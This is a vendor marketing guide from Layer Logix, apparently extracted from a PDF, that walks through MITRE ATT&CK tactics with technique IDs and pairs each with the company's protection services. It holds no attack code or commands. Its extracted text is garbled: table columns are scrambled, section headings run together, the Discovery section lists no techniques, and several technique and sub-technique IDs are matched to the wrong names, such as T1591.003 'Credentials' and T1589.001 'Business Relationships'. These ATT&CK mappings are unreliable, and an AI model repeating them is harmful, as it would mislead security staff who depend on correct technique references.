Comprehensive Guide to MITRE
ATT&CK Techniques and Layer
Logix Protection Strategies
The MITRE ATT&CK framework is an essential resource for understanding the tactics and techniques adversaries use to compromise systems. By mapping out the entire lifecycle of cyberattacks, it enables organizations to anticipate threats and implement e�ective defenses.
Layer Logix leverages the MITRE ATT&CK framework to deliver advanced cybersecurity solutions. By understanding each attack vector in depth, Layer Logix provides tailored defenses that mitigate risks at every stage of an attack.
Table of Contents
Reconnaissance
Attack Vector Summary: Reconnaissance involves adversaries gathering information about a target to identify potential vulnerabilities. This phase is critical as it lays the groundwork for subsequent attack stages
Techniques and Sub-Techniques
T1595
Active Scanning
T1592
T1591
Gather Victim Host Information
Gather Victim Identity Information
T1590
Gather Victim Network Information
T1589
Gather Victim Organization Information
- T1595.001: Scanning IP Blocks
- T1595.002: Vulnerability Scanning
- T1595.003: Wordlist Scanning
- T1592.001: Hardware
- T1592.002: Software
- T1592.003: Firmware
- T1591.001: Employee Names
- T1591.002: Email Addresses
- T1591.003: Credentials
- T1590.001: Domain Properties
- T1590.002: DNS
- T1590.003: Network Trust Dependencies
- T1589.001: Business Relationships
- T1589.002: Organizational Structure
- T1589.003: Geographic Locations
T1598
Phishing for Information
- T1598.001: Spearphishing Service
- T1598.002: Spearphishing Attachment
- T1598.003: Spearphishing Link
Active Scanning (T1595): Adversaries perform network scans to identify live hosts, open ports, and services running on target systems. This helps them find exploitable vulnerabilities
Gather Victim Host Information (T1592): Collecting data about hardware, software, and firmware provides insights into potential weaknesses.
Phishing for Information (T1598): Attackers use phishing techniques to trick individuals into revealing sensitive information.
Layer Logix Protection:
Network Monitoring: Implements intrusion detection systems (IDS) and intrusion prevention systems (IPS) to detect and block unauthorized scanning activities.
Threat Intelligence Integration: Utilizes global threat intelligence to identify and respond to reconnaissance activities targeting the organization.
Employee Training: Conducts regular security awareness programs to educate sta� about phishing tactics.
Resource Development
Attack Vector Summary: Resource Development involves adversaries establishing the resources needed to support their operations, such as infrastructure, capabilities, or accounts.
Techniques and Sub-Techniques
T1583
Acquire Infrastructure
T1587 Develop Capabilities
T1584
Compromise Infrastructure
- T1583.001: Domains
- T1583.002: DNS Server
- T1583.003: Virtual Private Servers
- T1583.004: Serverless Infrastructure
- T1583.005: Botnets
- T1587.001: Malware
- T1587.002: Code Signing
Certificates
- T1587.003: Digital
Certificates
- T1584.001: Domains
- T1584.002: DNS Server
- T1584.003: Virtual Private Servers
Expanded Information:
Acquire Infrastructure (T1583): Attackers purchase or lease infrastructure to host malicious operations, making it harder to trace activities back to them. Develop Capabilities (T1587): Creation of malware or tools that can exploit vulnerabilities in target systems.
Layer Logix Protection:
Domain Monitoring: Tracks domain registrations similar to the organization's name to detect potential spoofing.
Certificate Management: Validates code signing certificates to prevent the execution of unauthorized code.
Malware Analysis: Uses sandbox environments to analyze and detect custom-developed malware
Initial Access
Attack Vector Summary: Initial Access techniques are used by adversaries to penetrate a target network and establish a foothold.
T1566 Phishing
T1190
Sub-Techniques
- T1566.001: Spearphishing Attachment - T1566.002: Spearphishing Link - T1566.003: Spearphishing via Service
Exploit Public-Facing Application - N/A
T1195 Supply Chain Compromise - T1195.001: Compromise Software Dependencies and Development Tools
- T1195.002: Compromise Software Supply Chain
- T1195.003: Compromise Hardware Supply Chain
T1091 Replication Through Removable Media - N/A
Expanded Information:
Phishing (T1566): Adversaries craft deceptive emails or messages to trick users into divulging credentials or downloading malware
Exploit Public-Facing Application (T1190): Attackers target vulnerabilities in internetfacing applications to gain unauthorized access
Layer Logix Protection:
Email Security: Implements advanced email filtering and anti-phishing technologies to detect and block malicious emails
Web Application Firewalls (WAF): Protects public-facing applications from exploitation by filtering and monitoring HTTP tra�c.
Supply Chain Security: Evaluates and monitors third-party vendors to mitigate supply chain risks
Execution
Attack Vector Summary: Execution techniques involve adversaries running malicious code on victim systems, which is crucial for carrying out further actions.
Techniques and Sub-Techniques
Technique ID Technique
T1059
Command and Scripting Interpreter
T1204
T1047
User Execution
Sub-Techniques
- T1059.001: PowerShell
- T1059.003: Windows
Command Shell
- T1059.004: Unix Shell
- T1059.005: Visual Basic
- T1059.006: Python
- T1204.001: Malicious Link
- T1204.002: Malicious File
Windows Management Instrumentation - N/A
T1569 System Services - T1569.002: Service Execution
T1106 Native API - N/A
Expanded Information:
Command and Scripting Interpreter (T1059): Adversaries use built-in scripting environments to execute code, making detection harder
User Execution (T1204): Relies on social engineering to persuade users to run malicious code
Layer Logix Protection:
Application Control: Enforces policies that restrict the execution of unauthorized scripts and applications
Behavioral Analytics: Detects anomalous usage of scripting tools and command-line interfaces
User Education: Provides training to help users identify and avoid executing malicious content
Persistence
Attack Vector Summary: Persistence techniques allow adversaries to maintain access to systems across reboots and credential changes, ensuring long-term control.
Techniques and Sub-Techniques
T1547
Boot or Logon Autostart Execution
- T1547.001: Registry Run Keys / Startup Folder
- T1547.004: Winlogon Helper DLL
- T1547.005: Security Support Provider
- T1547.006: Kernel Modules and Extensions
T1053
T1574
Scheduled Task/Job
Hijack Execution Flow
T1505 Server Software Component
T1098 Account Manipulation
Expanded Information:
- T1053.002: At (Linux)
- T1053.003: Cron
- T1053.005: Scheduled Task
- T1574.001: DLL Search Order Hijacking
- T1574.002: DLL SideLoading
- T1574.004: Path Interception
- T1505.001: SQL Stored Procedures
- T1505.003: Web Shell
- T1098.001: Additional Cloud Credentials
- T1098.002: SSH Authorized Keys
Boot or Logon Autostart Execution (T1547): Modifying system settings so malicious code runs automatically at startup
Scheduled Task/Job (T1053): Creating tasks that execute code at predetermined times.
Layer Logix Protection:
Startup Monitoring: Watches for changes in registry keys and startup folders.
Task Scheduler Monitoring: Detects unauthorized scheduled tasks and jobs.
Endpoint Protection: Employs endpoint detection and response (EDR) tools to identify persistence mechanisms.
Privilege Escalation
Attack Vector Summary: Privilege Escalation techniques are used to gain higher-level permissions, enabling adversaries to perform actions that require elevated privileges
Techniques and Sub-Techniques
Technique ID Technique
Sub-Techniques
T1068 Exploitation for Privilege Escalation - N/A
T1055 Process Injection
- T1055.001: Dynamic-link Library Injection
- T1055.002: Portable Executable Injection
- T1055.003: Thread Execution Hijacking
T1078 Valid Accounts - T1078.001: Default Accounts
- T1078.002: Domain Accounts
- T1078.003: Local Accounts
T1548 Abuse Elevation Control Mechanism - T1548.002: Bypass User Account Control
- T1548.003: Sudo and Sudo Caching
T1134 Access Token Manipulation - T1134.001: Token Impersonation/Theft
- T1134.002: Create Process with Token
Expanded Information:
Exploitation for Privilege Escalation (T1068): Exploiting vulnerabilities to gain elevated permissions
Process Injection (T1055): Injecting malicious code into legitimate processes.
Layer Logix Protection:
Vulnerability Management: Regularly scans and patches systems to eliminate known vulnerabilities.
Memory Protection: Uses anti-exploitation tools to prevent process injection and other in-memory attacks.
Access Control Policies: Enforces the principle of least privilege to limit user permissions.
Defense Evasion
Attack Vector Summary: Defense Evasion techniques help adversaries avoid detection by security solutions, ensuring their activities remain undetected.
Techniques and Sub-Techniques
T1027 Obfuscated Files or Information
T1562
T1070
T1036
Impair Defenses
Indicator Removal on Host
- T1027.001: Binary Padding
- T1027.002: Software Packing
- T1027.003: Steganography
- T1562.001: Disable or Modify Tools
- T1562.004: Disable Windows Event Logging
- T1070.001: Clear Windows Event Logs
- T1070.004: File Deletion
- T1070.006: Timestomp
Masquerading
T1497
Expanded Information:
Virtualization/Sandbox Evasion
- T1036.003: Rename System Utilities
- T1036.005: Match Legitimate Name or Location
- T1497.001: System Checks
- T1497.002: User Activity Based Checks
Obfuscated Files or Information (T1027): Hiding malicious code using techniques like encryption or encoding. Impair Defenses (T1562): Disabling security tools to prevent detection.
Layer Logix Protection: Credential
Advanced Threat Detection: Employs machine learning to detect obfuscated malware
Security Tool Monitoring: Alerts administrators if security tools are disabled or modified. Integrity Checks: Uses file integrity monitoring to detect unauthorized changes.
Attack Vector Summary: Credential Access techniques involve stealing usernames and passwords, allowing adversaries to gain unauthorized access to systems and data.
Techniques and Sub-Techniques
Technique ID Technique
T1003
Sub-Techniques
OS Credential Dumping - T1003.001: LSASS Memory
- T1003.002: Security Account Manager
- T1003.003: NTDS
- T1003.004: LSA Secrets
T1110
Brute Force
- T1110.001: Password Guessing
- T1110.002: Password Cracking
- T1110.003: Password Spraying
T1056 Input Capture - T1056.001: Keylogging - T1056.002: GUI Input Capture
T1555 Credentials from Password Stores - T1555.001: Keychain - T1555.003: Credentials from Web Browsers
T1528 Steal Application Access Token - N/A
Expanded Information:
OS Credential Dumping (T1003): Extracting credentials from operating system components.
Brute Force (T1110): Systematically attempting all possible passwords
Layer Logix Protection:
Credential Management: Implements strong password policies and regular password changes
Discovery
Attack Vector Summary: Discovery techniques enable adversaries to gain knowledge about the system and network, facilitating further exploitation.
Techniques and Sub-Techniques
Multi-Factor Authentication (MFA): Adds an extra layer of security beyond passwords. Anomaly Detection: Monitors for unusual login patterns indicative of credential theft Technique
Expanded Information:
File and Directory Discovery (T1083): Searching for files that may contain valuable data. System Network Configuration Discovery (T1016): Gathering information about network interfaces and settings.
Layer Logix Protection:
Access Controls: Restricts user permissions to limit access to system information.
Monitoring Tools: Detects and alerts on the use of system commands commonly used for discovery
Lateral Movement
Attack Vector Summary: Lateral Movement techniques allow adversaries to move through a network to access additional resources and systems.
Techniques and Sub-Techniques
Technique ID Technique
T1021
T1072
T1210
T1563
Expanded Information:
Remote Services
Sub-Techniques
- T1021.001: Remote Desktop Protocol - T1021.002: SMB/Windows Admin Shares
- T1021.003: Distributed Component Object Model (DCOM)
Software Deployment Tools - N/A
Exploitation of Remote Services - N/A
Remote Service Session Hijacking
- T1563.001: SSH Hijacking - T1563.002: RDP Hijacking
Remote Services (T1021): Using legitimate remote services to access other systems. Remote Service Session Hijacking (T1563): Taking over existing remote sessions.
Layer Logix Protection:
Network Segmentation: Divides the network into segments to limit lateral movement. Access Monitoring: Logs and reviews remote access attempts. Zero Trust Architecture: Verifies every access request, regardless of origin.
Collection
Attack Vector Summary: Collection techniques involve gathering data of interest from target systems for exfiltration.
Techniques and Sub-Techniques
T1005 Data from Local System - N/A
T1039 Data from Network Shared Drive
T1056 Input Capture - T1056.001: Keylogging - T1056.002: GUI Input Capture
Expanded Information:
Data from Local System (T1005): Collecting files from the local system that may contain sensitive information.
Automated Collection (T1119): Using scripts or tools to automatically collect data over time.
Layer Logix Protection:
Data Access Controls: Implements strict permissions on sensitive files
DLP Solutions: Monitors and controls the movement of sensitive data.
Encryption: Protects data at rest and in transit
Command and Control
Attack Vector Summary: Command and Control (C2) techniques are used by adversaries to communicate with compromised systems and control them remotely.
Techniques and Sub-Techniques
Technique ID Technique
T1071
Application Layer Protocol
Sub-Techniques
- T1071.001: Web Protocols
- T1071.002: File Transfer Protocols
- T1071.003: Mail Protocols
T1095 Non-Application Layer Protocol - N/A
T1573 Encrypted Channel
T1001 Data Obfuscation
- T1573.001: Symmetric Cryptography
- T1573.002: Asymmetric Cryptography
- T1001.001: Junk Data
- T1001.002: Steganography
T1105 Ingress Tool Transfer - N/A
Expanded Information:
Application Layer Protocol (T1071): Using standard protocols to blend malicious tra�c with legitimate network tra�c. Encrypted Channel (T1573): Encrypting C2 communications to evade detection.
Layer Logix Protection:
Network Tra�c Analysis: Uses deep packet inspection to detect anomalies in network tra�c.
SSL/TLS Inspection: Decrypts and inspects encrypted tra�c for malicious content. C2 Blacklisting: Maintains updated lists of known malicious C2 servers
Exfiltration
Attack Vector Summary: Exfiltration techniques are methods used to transfer data out of the target network, often covertly.
Techniques and Sub-Techniques
Technique ID Technique
T1041
T1011
T1567
T1052
Sub-Techniques
Exfiltration Over C2 Channel - N/A
Exfiltration Over Other Network Medium - N/A
Exfiltration Over Web Service
- T1567.001: Exfiltration to Cloud Storage
- T1567.002: Exfiltration to Code Repository
Exfiltration Over Physical Medium - N/A
T1020 Automated Exfiltration - N/A
Expanded Information:
Exfiltration Over C2 Channel (T1041): Using the established C2 channel to exfiltrate data.
Exfiltration Over Web Service (T1567): Uploading data to web services like cloud storage or code repositories.
Layer Logix Protection:
Outbound Tra�c Monitoring: Analyzes outgoing tra�c for signs of data exfiltration. Data Loss Prevention (DLP): Blocks unauthorized data transfers.
User Activity Monitoring: Detects abnormal user behaviors that may indicate exfiltration.
Impact
Attack Vector Summary: Impact techniques are used to disrupt or destroy systems and data, a�ecting the availability, integrity, and confidentiality of resources
Techniques and Sub-Techniques
T1485 Data Destruction - N/A
T1486 Data Encrypted for Impact - N/A
T1499 Endpoint Denial of Service - T1499.001: OS Exhaustion Flood
- T1499.002: Service Exhaustion Flood
T1529 System Shutdown/Reboot - N/A
T1491 Defacement - T1491.001: Internal Defacement
Expanded Information:
- T1491.002: External Defacement
Data Destruction (T1485): Deleting or overwriting files to disrupt operations.
Data Encrypted for Impact (T1486): Encrypting files and demanding ransom for decryption keys.
Layer Logix Protection:
Backup Solutions: Maintains regular backups to restore data after destruction or encryption.
Ransomware Protection: Uses specialized tools to detect and block ransomware activities.
Incident Response Planning: Prepares for quick recovery from impact events.
Conclusion
Understanding the MITRE ATT&CK framework enables organizations to anticipate and defend against sophisticated cyber threats Layer Logix integrates this framework into its cybersecurity solutions, providing comprehensive protection across all stages of the attack lifecycle.
Key Advantages of Layer Logix: Technique ID Technique
Proactive Threat Hunting: Continuously searches for threats within the network
Advanced Analytics: Utilizes AI and machine learning to detect anomalies. Customizable Security Policies: Tailors defenses to the organization's unique environment.
Comprehensive Reporting: O�ers detailed insights into security posture and incidents
Secure your organization with Layer Logix and fortify your defenses against advanced cyber threats.
Note: This guide is based on the MITRE ATT&CK framework as of October 2023. For the latest updates, please visit the o�cial MITRE ATT&CK website